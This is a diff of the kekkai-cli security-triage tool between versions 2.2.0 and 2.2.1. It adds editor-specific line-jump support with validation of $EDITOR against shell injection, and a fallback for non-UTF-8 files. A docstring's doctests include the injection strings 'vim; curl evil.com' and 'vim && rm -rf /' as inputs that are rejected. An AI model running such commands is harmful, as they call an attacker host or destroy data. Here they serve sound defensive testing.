kekkai-cli 2.2.0__py3-none-any.whl → 2.2.1__py3-none-any.whl

kekkai/cli.py

@@ -1268,9 +1268,12 @@ def _command_triage(parsed: argparse.Namespace) -> int:
             except (OSError, json.JSONDecodeError, KeyError):
                 pass
 
-    # Fall back to current directory if still not set
+    # Fall back to current directory if still not set (with warning)
     if repo_path is None:
         repo_path = Path.cwd()
+        console.print("[warning]⚠ Repo path not detected. Using current directory.[/warning]")
+        console.print("[dim]Tip: Use --repo to specify repository root explicitly.[/dim]")
+        console.print(f"[dim]Current directory: {repo_path}[/dim]\n")
 
     return run_triage(
         findings=findings,

kekkai/output.py

@@ -57,7 +57,7 @@ BANNER_ASCII = r"""
 /_/\_\\___/_/\_/_/\_\\_,_/_/
 """
 
-VERSION = "2.2.0"
+VERSION = "2.2.1"
 
 
 def print_dashboard() -> None:

kekkai/triage/code_context.py

@@ -210,22 +210,38 @@ class CodeContextExtractor:
                 error=f"File too large for display ({size_mb:.1f}MB)",
             )
 
-        # Read file content (with caching for performance)
+        # Read file content (with caching for performance and encoding fallback)
         cache_key = str(full_path)
         if cache_key in self._file_cache:
             file_content = self._file_cache[cache_key]
         else:
             try:
+                # Try UTF-8 first (strict mode)
                 file_content = full_path.read_text(encoding="utf-8")
-                # Cache the content
-                self._file_cache[cache_key] = file_content
-                # Evict oldest entry if cache is full (simple FIFO)
-                if len(self._file_cache) > self._cache_max_size:
-                    # Remove first (oldest) entry
-                    oldest_key = next(iter(self._file_cache))
-                    del self._file_cache[oldest_key]
-            except (OSError, UnicodeDecodeError) as e:
-                # ASVS V7.4.1: Sanitized error
+            except UnicodeDecodeError:
+                # HOTFIX: Fallback to UTF-8 with replacement characters
+                # This allows viewing legacy files (Windows-1252, Latin-1) with � for invalid chars
+                # instead of completely hiding the file with "Cannot read file" error
+                logger.info(
+                    "code_context_encoding_fallback",
+                    extra={"file_path": Path(file_path).name, "reason": "non_utf8"},
+                )
+                try:
+                    file_content = full_path.read_text(encoding="utf-8", errors="replace")
+                except (OSError, UnicodeDecodeError) as e:
+                    # Even fallback failed (should be rare - permissions, etc.)
+                    logger.warning(
+                        "code_context_read_error",
+                        extra={"file_path": Path(file_path).name, "error": str(e)},
+                    )
+                    return CodeContext(
+                        code="",
+                        language="",
+                        vulnerable_line="",
+                        error="Cannot read file (encoding error)",
+                    )
+            except OSError as e:
+                # File read error (permissions, etc.)
                 logger.warning(
                     "code_context_read_error",
                     extra={"file_path": Path(file_path).name, "error": str(e)},
@@ -237,6 +253,14 @@ class CodeContextExtractor:
                     error="Cannot read file",
                 )
 
+            # Cache the content
+            self._file_cache[cache_key] = file_content
+            # Evict oldest entry if cache is full (simple FIFO)
+            if len(self._file_cache) > self._cache_max_size:
+                # Remove first (oldest) entry
+                oldest_key = next(iter(self._file_cache))
+                del self._file_cache[oldest_key]
+
         # Extract code context using existing logic from fix engine
         code_context, vulnerable_line = self._prompt_builder.extract_code_context(
             file_content, line

kekkai/triage/editor_support.py

@@ -0,0 +1,166 @@
+"""Editor-specific line jump syntax support.
+
+Provides detection and command building for popular editors with
+security validation per ASVS V5.1.3.
+"""
+
+from __future__ import annotations
+
+import re
+from dataclasses import dataclass
+from pathlib import Path
+
+__all__ = [
+    "EditorConfig",
+    "detect_editor_config",
+    "validate_editor_name",
+    "EDITOR_REGISTRY",
+]
+
+# ASVS V5.1.3: Only allow safe characters in editor names
+EDITOR_NAME_PATTERN = re.compile(r"^[a-zA-Z0-9/_.-]+$")
+
+
+@dataclass
+class EditorConfig:
+    """Editor-specific command line configuration.
+
+    Attributes:
+        name: Canonical editor name (e.g., "vim", "code", "subl").
+        syntax_type: Command syntax category for building commands.
+    """
+
+    name: str
+    syntax_type: str  # "vim", "vscode", "sublime", "notepadpp", "jetbrains"
+
+
+# Editor registry mapping base names to configurations
+EDITOR_REGISTRY: dict[str, EditorConfig] = {
+    # Vim family (syntax: editor +LINE file)
+    "vim": EditorConfig("vim", "vim"),
+    "nvim": EditorConfig("nvim", "vim"),
+    "neovim": EditorConfig("neovim", "vim"),
+    "vi": EditorConfig("vi", "vim"),
+    # Emacs family (syntax: editor +LINE file)
+    "emacs": EditorConfig("emacs", "vim"),
+    "nano": EditorConfig("nano", "vim"),
+    # VS Code (syntax: code -g file:line)
+    "code": EditorConfig("code", "vscode"),
+    "code-insiders": EditorConfig("code-insiders", "vscode"),
+    "codium": EditorConfig("codium", "vscode"),  # VSCodium (FOSS fork)
+    # Sublime Text (syntax: subl file:line)
+    "subl": EditorConfig("subl", "sublime"),
+    "sublime": EditorConfig("sublime", "sublime"),
+    "sublime_text": EditorConfig("sublime_text", "sublime"),
+    # Atom (syntax: atom file:line) - legacy but still used
+    "atom": EditorConfig("atom", "sublime"),
+    # Notepad++ (syntax: notepad++ -nLINE file)
+    "notepad++": EditorConfig("notepad++", "notepadpp"),
+    "notepad++.exe": EditorConfig("notepad++.exe", "notepadpp"),
+    # JetBrains IDEs (syntax: editor --line LINE file)
+    "idea": EditorConfig("idea", "jetbrains"),
+    "pycharm": EditorConfig("pycharm", "jetbrains"),
+    "webstorm": EditorConfig("webstorm", "jetbrains"),
+    "phpstorm": EditorConfig("phpstorm", "jetbrains"),
+    "goland": EditorConfig("goland", "jetbrains"),
+    "rider": EditorConfig("rider", "jetbrains"),
+    "clion": EditorConfig("clion", "jetbrains"),
+    "rubymine": EditorConfig("rubymine", "jetbrains"),
+}
+
+
+def detect_editor_config(editor_name: str) -> EditorConfig:
+    """Detect editor configuration from name.
+
+    Args:
+        editor_name: Editor executable name (e.g., "vim", "/usr/bin/code").
+
+    Returns:
+        EditorConfig for the detected editor, or vim-style default if unknown.
+
+    Examples:
+        >>> detect_editor_config("vim").syntax_type
+        'vim'
+        >>> detect_editor_config("/usr/local/bin/code").syntax_type
+        'vscode'
+        >>> detect_editor_config("unknown-editor").syntax_type
+        'vim'
+    """
+    # Extract base name from path
+    base_name = Path(editor_name).stem.lower()
+
+    # Handle .exe extension on Windows
+    if base_name.endswith(".exe"):
+        base_name = base_name[:-4]
+
+    # Lookup in registry
+    config = EDITOR_REGISTRY.get(base_name)
+    if config:
+        return config
+
+    # Default to vim-style syntax for unknown editors
+    return EditorConfig("unknown", "vim")
+
+
+def validate_editor_name(editor: str) -> bool:
+    """Validate that editor name is safe to use.
+
+    Security: ASVS V5.1.3 - Validate data at trust boundaries.
+    Rejects editor names containing shell metacharacters to prevent
+    command injection attacks.
+
+    Args:
+        editor: Editor name from environment variable.
+
+    Returns:
+        True if editor name is safe, False if it contains unsafe characters.
+
+    Examples:
+        >>> validate_editor_name("vim")
+        True
+        >>> validate_editor_name("/usr/bin/code")
+        True
+        >>> validate_editor_name("vim; curl evil.com")
+        False
+        >>> validate_editor_name("vim && rm -rf /")
+        False
+    """
+    if not editor:
+        return False
+
+    # Check against safe pattern (alphanumeric + /.-_ only)
+    return bool(EDITOR_NAME_PATTERN.match(editor))
+
+
+def build_editor_command(
+    editor_path: str, file_path: Path, line: int, editor_config: EditorConfig
+) -> list[str]:
+    """Build editor command arguments based on editor type.
+
+    Args:
+        editor_path: Full path to editor executable.
+        file_path: Path to file to open.
+        line: Line number to jump to.
+        editor_config: Editor configuration with syntax type.
+
+    Returns:
+        List of command arguments for subprocess.run().
+
+    Security:
+        ASVS V14.2.1 - Uses list args (not shell string) to prevent injection.
+    """
+    if editor_config.syntax_type == "vscode":
+        # VS Code: code -g file:line
+        return [editor_path, "-g", f"{file_path}:{line}"]
+    elif editor_config.syntax_type == "sublime":
+        # Sublime Text / Atom: editor file:line
+        return [editor_path, f"{file_path}:{line}"]
+    elif editor_config.syntax_type == "notepadpp":
+        # Notepad++: notepad++ -nLINE file
+        return [editor_path, f"-n{line}", str(file_path)]
+    elif editor_config.syntax_type == "jetbrains":
+        # JetBrains IDEs: editor --line LINE file
+        return [editor_path, "--line", str(line), str(file_path)]
+    else:
+        # Default (Vim/Emacs/Nano): editor +LINE file
+        return [editor_path, f"+{line}", str(file_path)]

kekkai/triage/screens.py

@@ -436,6 +436,8 @@ class FindingDetailScreen(Screen[None]):
         import shutil
         import subprocess
 
+        from .editor_support import build_editor_command, detect_editor_config, validate_editor_name
+
         logger = logging.getLogger(__name__)
 
         if not self.finding.file_path or not self.finding.line:
@@ -448,6 +450,15 @@ class FindingDetailScreen(Screen[None]):
         # Get editor from environment (ASVS V5.1.3: validate before use)
         editor = os.environ.get("EDITOR", "vim")
 
+        # ASVS V5.1.3: Validate EDITOR value before use (reject shell metacharacters)
+        if not validate_editor_name(editor):
+            self.notify(
+                f"Editor '{editor}' contains unsafe characters. Set a valid $EDITOR.",
+                severity="error",
+            )
+            logger.warning("unsafe_editor_value", extra={"editor": editor})
+            return
+
         # Security validation: check editor exists and is executable
         editor_path = shutil.which(editor)
         if not editor_path:
@@ -463,18 +474,22 @@ class FindingDetailScreen(Screen[None]):
             self.notify(f"File not found: {self.finding.file_path}", severity="error")
             return
 
+        # Detect editor type and build appropriate command
+        editor_config = detect_editor_config(editor)
+
         # Log editor invocation (ASVS V16.7.1)
         logger.info(
             "editor_opened",
             extra={
                 "editor": editor,
+                "editor_type": editor_config.syntax_type,
                 "file": self.finding.file_path,
                 "line": self.finding.line,
             },
         )
 
         # ASVS V14.2.1: Use list args (not shell=True) to prevent injection
-        cmd = [editor_path, f"+{self.finding.line}", str(file_path)]
+        cmd = build_editor_command(editor_path, file_path, self.finding.line, editor_config)
 
         try:
             # Suspend TUI, run editor, then resume

{kekkai_cli-2.2.0.dist-info → kekkai_cli-2.2.1.dist-info}/METADATA

@@ -1,6 +1,6 @@
 Metadata-Version: 2.4
 Name: kekkai-cli
-Version: 2.2.0
+Version: 2.2.1
 Summary: Terminal UI for Trivy/Semgrep/Gitleaks. Local-first security triage.
 Requires-Python: >=3.12
 Description-Content-Type: text/markdown

{kekkai_cli-2.2.0.dist-info → kekkai_cli-2.2.1.dist-info}/RECORD

@@ -1,10 +1,10 @@
 kekkai/__init__.py,sha256=_VrBvJRyqHiXs31S8HOhATk_O2iy-ac0_9X7rHH75j8,143
-kekkai/cli.py,sha256=Rj8lsUciI4Rsn5_wfwYDkrD3EsR5FFy2PZzd2qbq3XQ,68206
+kekkai/cli.py,sha256=Mua85FZFkpEmPtP3IUFh1sKkBsQLllln_Qe-ju5okgw,68479
 kekkai/config.py,sha256=LE7bKsmv5dim5KnZya0V7_LtviNQ1V0pMN_6FyAsMpc,13084
 kekkai/dojo.py,sha256=erLdTMOioTyzVhXYW8xgdbU5Ro-KQx1OcTQN7_zemmY,18634
 kekkai/dojo_import.py,sha256=D0ZQM_0JYHqUqJA3l4nKD-RkpvcOcgj-4zv59HRcQ6k,7274
 kekkai/manifest.py,sha256=Ph5xGDKuVxMW1GVIisRhxUelaiVZQe-W5sZWsq4lHqs,1887
-kekkai/output.py,sha256=V8GkFgaT8oYQOxplBeSXv60q6BeBICTfrrLE-5qDuIc,5426
+kekkai/output.py,sha256=1T077PHznM8yfDWycfihvGTGrrpymoAkaHlMr8hAjkk,5426
 kekkai/paths.py,sha256=EcyG3CEOQFQygowu7O5Mp85dKkXWWvnm1h0j_BetGxY,1190
 kekkai/policy.py,sha256=0XCUH-SbnO1PsM-exjSFHYHRnLkiNa50QfkyPakwNko,9792
 kekkai/runner.py,sha256=MBFUiJ4sSVEGNbJ6cv-8p1WHaHqjio6yWEfr_K4GuTs,2037
@@ -61,12 +61,13 @@ kekkai/threatflow/sanitizer.py,sha256=uQsxYZ5VDXutZoj-WMl7fo5T07uHuQZqgVzoVMoaKe
 kekkai/triage/__init__.py,sha256=lUDFJqQk0EjQD2ZP6s3WQnZ8R-KGds8_W7RmFzBDPN8,2463
 kekkai/triage/app.py,sha256=WKvT00UDO2ywVgahLlHAcqB-OnPN05Ps_FKoN6RY0lc,5615
 kekkai/triage/audit.py,sha256=UVaSKKC6tZkHxEoMcnIZkMOT_ngj7QzHWYuDAHas_sc,5842
-kekkai/triage/code_context.py,sha256=UyPtvUwdfZLuJjDpzmusYkLzs27GyiInTer95wrYg94,10111
+kekkai/triage/code_context.py,sha256=kmAkQaxgGIxzf2n5s9vkwOBetmuZrQhoDuygxmU9cjg,11311
+kekkai/triage/editor_support.py,sha256=IpOe4KXUdxKBAQMoCWGTNRK2sGYRpuVySiHQRLm4ugc,5497
 kekkai/triage/fix_screen.py,sha256=jL0ZXoNKBvkhrnWxutPrviMRL5iacJ19qpxX3hKEZvc,8843
 kekkai/triage/ignore.py,sha256=uBKM7zKyzORj9LJ5AAnoYWZQTRy57P0ZofSapiDWcfI,7305
 kekkai/triage/loader.py,sha256=vywhS8fcre7PiBX3H2CpKXFxzvO7LcDnIHIB0kzG3R4,5850
 kekkai/triage/models.py,sha256=nRmWtELMqHWHX1NqZ2upH2ZAJVeBxa3Wh8f3kkB9WYo,5384
-kekkai/triage/screens.py,sha256=XeQUiTagNXL_CdH_oqtDnPOdusteRiNBMRBnXeoypK0,19891
+kekkai/triage/screens.py,sha256=it253GNli37S2CkijbVfoxmiobEV3M3-FYdqXhp1tWk,20575
 kekkai/triage/widgets.py,sha256=eOF6Qoo5uBqjxiEkbpgcO1tbIOGBQBKn75wP9Jw_AaE,4733
 kekkai_core/__init__.py,sha256=gREN4oarM0azTkSTWTnlDnPZGgv1msai2Deq9Frj3gc,122
 kekkai_core/redaction.py,sha256=EeWYPjAs2hIXlLKGmGn_PRdK08G4KcOBmbRCoFklbHc,2893
@@ -86,8 +87,8 @@ kekkai_core/windows/chocolatey.py,sha256=tF5S5eN-HeENRt6yQ4TZgwng0oRMX_ScskQ3-eb
 kekkai_core/windows/installer.py,sha256=MePAywHH3JTIAENv52XtkUMOGqmYqZqkH77VW5PST8o,6945
 kekkai_core/windows/scoop.py,sha256=lvothICrAoB3lGfkvhqVeNTB50eMmVGA0BE7JNCfHdI,5284
 kekkai_core/windows/validators.py,sha256=45xUuAbHcKc0WLIZ-0rByPeDD88MAV8KvopngyYBHpQ,6525
-kekkai_cli-2.2.0.dist-info/METADATA,sha256=EreFgZdr64N1_IITenfMRgnQCDBtQ6Fabvye96QT3g8,7865
-kekkai_cli-2.2.0.dist-info/WHEEL,sha256=wUyA8OaulRlbfwMtmQsvNngGrxQHAvkKcvRmdizlJi0,92
-kekkai_cli-2.2.0.dist-info/entry_points.txt,sha256=MBV1OIfxJmT2oJvzeeFKIH1eh8M9kKAn7JqFBeuMfWA,43
-kekkai_cli-2.2.0.dist-info/top_level.txt,sha256=wWwh7GGPaUjcaCRmt70ueL3WQoQbeGa5L0T0hgOh-MY,19
-kekkai_cli-2.2.0.dist-info/RECORD,,
+kekkai_cli-2.2.1.dist-info/METADATA,sha256=rFe0gsYLeFJPliwHjenTd3jk6VCsB0qlwCkO6OAzxJo,7865
+kekkai_cli-2.2.1.dist-info/WHEEL,sha256=wUyA8OaulRlbfwMtmQsvNngGrxQHAvkKcvRmdizlJi0,92
+kekkai_cli-2.2.1.dist-info/entry_points.txt,sha256=MBV1OIfxJmT2oJvzeeFKIH1eh8M9kKAn7JqFBeuMfWA,43
+kekkai_cli-2.2.1.dist-info/top_level.txt,sha256=wWwh7GGPaUjcaCRmt70ueL3WQoQbeGa5L0T0hgOh-MY,19
+kekkai_cli-2.2.1.dist-info/RECORD,,